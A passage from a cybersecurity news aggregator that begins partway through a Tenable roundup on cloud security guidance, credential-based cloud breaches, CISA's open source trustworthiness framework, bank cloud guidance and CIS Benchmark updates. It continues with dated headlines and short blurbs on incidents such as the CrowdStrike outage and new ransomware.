Focus in Cloud Computing,” including adding new topics like artificial intelligence (AI), and boosting coverage of areas like data security and IAM.The guide is aimed at helping organizations understand cloud computing components and cloud security best practices. Version 5, released this week, replaces version 4, which was published in 2017.“We have completely revamped this updated 5th version to align with modern technologies and challenges,” reads the CSA blog “New Cloud Security Guidance from CSA.” Here’s some of what’s new:Increased coverage of cloud workloads, application security, CI/CD, data security and DevSecOpsNew topics such as AI and zero trustLess emphasis on laws and regulationsThe guide is organized into 12 sections, including:Cloud computing concepts and architecturesCloud governance and strategiesRisk, audit and complianceIAMCloud workload securityData securityFor more information about cloud security, check out these Tenable resources:“Tag, You’re IT! Tagging Your Way to Cloud Security Excellence” (blog)“Leveraging CIEM to Secure Cloud Identities and Entitlements at Scale” (on-demand webinar)“Understanding Customer Managed Encryption Keys in AWS, Azure and GCP” (blog)“Secure Your Cloud-Native Applications” (on-demand webinar)“Cloud Workload Protection: The Key to Decreasing Cloud Security Risks” (blog)3 - Google: Credential gaps top initial-access vectors for cloud breachesWhen it comes to gaining an initial foothold in a cloud environment, attackers’ best friends are weak or simply non-existent credentials. That’s according to the latest “Google Cloud Threat Horizons Report,” which is based on data gathered during the first half of 2024.Specifically, weak or no credentials accounted for 47.2% of initial-access vectors in cloud compromises observed by Google Cloud in customer environments.(Source: Google Cloud Threat Horizons Report, July 2024)Meanwhile, using the compromised system for cryptomining ranked as attackers’ top intrusion motivation (58.8%).(Source: Google Cloud Threat Horizons Report, July 2024)For more information about identity and access management security:“Poor Identity Hygiene at Root of Nation-State Attack Against Microsoft” (Tenable)“What is identity and access management? Guide to IAM” (TechTarget)“What is IAM? Identity and access management explained” (CSO)“Multifactor Authentication Is Not Enough to Protect Cloud Data” (Dark Reading)4 - CISA working on OSS security framework, assessment toolAs part of its efforts to help improve the security of open source software (OSS), CISA is crafting a framework and backing the development of an automated tool for assessing whether an OSS component is trustworthy.“As work on both the framework and supporting tools continue to progress, we will improve our capability to assess OSS trustworthiness at scale,” reads CISA’s blog “Continued Progress Towards a Secure Open Source Ecosystem.”The assessment framework will evaluate four aspects of the development of an OSS component:Its project, including the number of active contributors and unexpected ownership changesThe product, including whether it contains known vulnerabilities or outdated dependenciesIts protections, such as whether developer accounts require MFAIts policies, such as requirements for code reviews and vulnerability disclosures“Taken together, the collected measurements can be grouped into these four categories to provide software users and choosers a consistent way to evaluate the trustworthiness of a particular OSS component,” wrote blog author Aeva Black, CISA’s Section Chief of Open Source Software Security.To automate the framework’s measurement process and combine the measurement results, CISA is funding the development of an open source tool called Hipcheck, which is designed to “automatically assess and score software repositories for supply chain risk,” according to its Github page.For more information about open source software security:“Establishing a security baseline for open source projects” (Help Net Security)“OWASP Top 10 Risks for Open Source Software” (OWASP)“Create an open source security policy for your organization” (TechTarget)“How to Navigate Open-Source Security Without Stifling Innovation” (Infosecurity)“Study finds that SW developers lack cybersecurity skills” (Tenable)5 - Banks get guidance on secure cloud adoptionBanks and other financial services institutions looking for fresh guidance on adopting cloud securely can check out new best-practices documents published this week.The documents, published by the U.S. Treasury Department and the Financial Services Sector Coordinating Council (FSSCC) industry non-profit group, seek to accomplish goals such as:Establishing a common cloud-computing terminology for banks and regulators.Crafting best practices for reducing cloud-related third-party riskImproving transparency and monitoring of cloud servicesCreating a framework for cloud services adoption“Today’s publications mark a significant step forward by providing a roadmap and helpful resources for banks of all sizes,” Acting Comptroller of the Currency Michael J. Hsu said in a statement. “These documents also clarify cloud service providers’ responsibilities for ensuring a secure and resilient financial system.”To get more details, check out the Treasury’s announcement “Treasury and the Financial Services Sector Coordinating Council Publish New Resources on Effective Practices for Secure Cloud Adoption.”For more information about cybersecurity in the financial sector:“The cyber clock is ticking: Derisking emerging technologies in financial services” (McKinsey)“A Cyber Defense Guide for the Financial Sector” (Center for Internet Security)“4 steps to secure your treasury operations from cyberattacks” (J.P. Morgan)“Global financial stability at risk due to cyber threats” (World Economic Forum)“The rise of cyberattacks on financial institutions highlights the need to build a security culture” (SC Magazine)6 - CIS updates Benchmarks for Apple, Google, Red Hat productsApple’s macOS. Microsoft’s Windows Server. Red Hat’s Enterprise Linux. Google’s Kubernetes Engine.Those are among the products included in the latest round of updates for the popular CIS Benchmarks from the Center for Internet Security.Specifically, these new secure-configuration recommendations were updated in June:CIS AlmaLinux OS 9 Benchmark v2.0.0CIS Apple macOS 12.0 Monterey Benchmark v3.1.0CIS Apple macOS 13.0 Ventura Benchmark v2.1.0CIS Apple macOS 14.0 Sonoma Benchmark v1.1.0CIS Google Kubernetes Engine (GKE) Benchmark v1.6.0CIS Microsoft Windows Server 2019 Stand-alone Benchmark v2.0.0CIS NGINX Benchmark v2.1.0CIS Oracle Linux 9 Benchmark v2.0.0CIS Red Hat Enterprise Linux 9 Benchmark v2.0.0CIS Red Hat OpenShift Container Platform Benchmark v1.6.0CIS Rocky Linux 9 Benchmark v2.0.0 In addition, CIS released brand new Benchmarks for AWS storage services, including Amazon Simple Storage Service (S3), and for Microsoft Azure database services, including Azure SQL.Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families. Categories include cloud platforms; databases; desktop and server software; mobile devices; operating systems; and more.To get more details, read the CIS blog “CIS Benchmarks July 2024 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:“Getting to Know the CIS Benchmarks” (CIS)“Security Via Consensus: Developing the CIS Benchmarks” (Dark Reading)“How to Unlock the Security Benefits of the CIS Benchmarks” (Tenable)“CIS Benchmarks Communities: Where configurations meet consensus” (Help Net Security)“CIS Benchmarks: DevOps Guide to Hardening the Cloud” (DevOps)

by Tenable

2024-07-19 08:40:01

Huge Microsoft Outage Linked to CrowdStrike Takes Down Computers Around the World

A software update from cybersecurity company CrowdStrike appears to have inadvertently disrupted IT systems globally.

by WIRED Security News

2024-07-19 07:58:25

Security News You Can Use—Issue 16

Welcome to the next edition of Forcepoint Security News—curated news meant to provide a quick look at what''s happening around the cybersecurity industry. In this issue, Google, OpenAI, Microsoft, Amazon, Nvidia and other big names in AI band together as the Coalition for Secure AI (CoSAI), Tag-100 hackers turn to open-source tools, FIN7 hackers sell anti Endpoint Detection & Response...

by Forcepoint Blog

2024-07-18 22:33:53

CISA Publishes Resiliency Playbook for Critical Infrastructure

The manual provides guidance on how to improve the resiliency of critical infrastructure.

by Dark Reading

2024-07-18 22:30:33

CSA Updates Cloud Security Certificate, Training

The latest version of the Cloud Security Alliance''s certification provides a comprehensive catalog of essential skills that cybersecurity professionals need to master.

by Dark Reading

2024-07-18 21:43:20

Sizable Chunk of SEC Charges Against SolarWinds Tossed Out of Court

Judge dismisses claims against SolarWinds for actions taken after its systems had been breached, but allows the case to proceed for alleged misstatements prior to the incident.

by Dark Reading

2024-07-18 21:41:51

Researcher finds flaw in a16z website that exposed some company data

Venture capital giant a16z fixed a security vulnerability in one of the firm''s websites after being warned by a security researcher. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-18 21:13:10

Why Microsoft? Why?

A vulnerability in IE (yes! IE!) has been used for over a year as a zero-day to plant infostealers on Windows machines.

by ThreatDown

2024-07-18 21:04:59

US Data Breach Victim Numbers Increase by 1,000%, Literally

Though the number of victims has risen, the actual number of breaches has gone down, as fewer, bigger breaches affect more individuals.

by Dark Reading

2024-07-18 20:31:00

Cybersecurity Threat Advisory: Emergence of Eldorado RaaS

A new ransomware-as-a-service (RaaS), known as Eldorado, recently emerged, introducing locker variants for both VMware ESXi and Windows systems.

by Barracuda

2024-07-18 20:12:11

Breaking the cyber kill chain with AI

The cyber kill chain framework helps companies defend against all stages of cyberattack. This post examines the framework and how artificial intelligence integrates into each stage.

by Barracuda

2024-07-18 20:07:37

Get patching! Old vCenter vulnerability actively abused

CISA has added a two-year-old vulnerability in vCenter to its catalog of known exploited vulnerabilities

by ThreatDown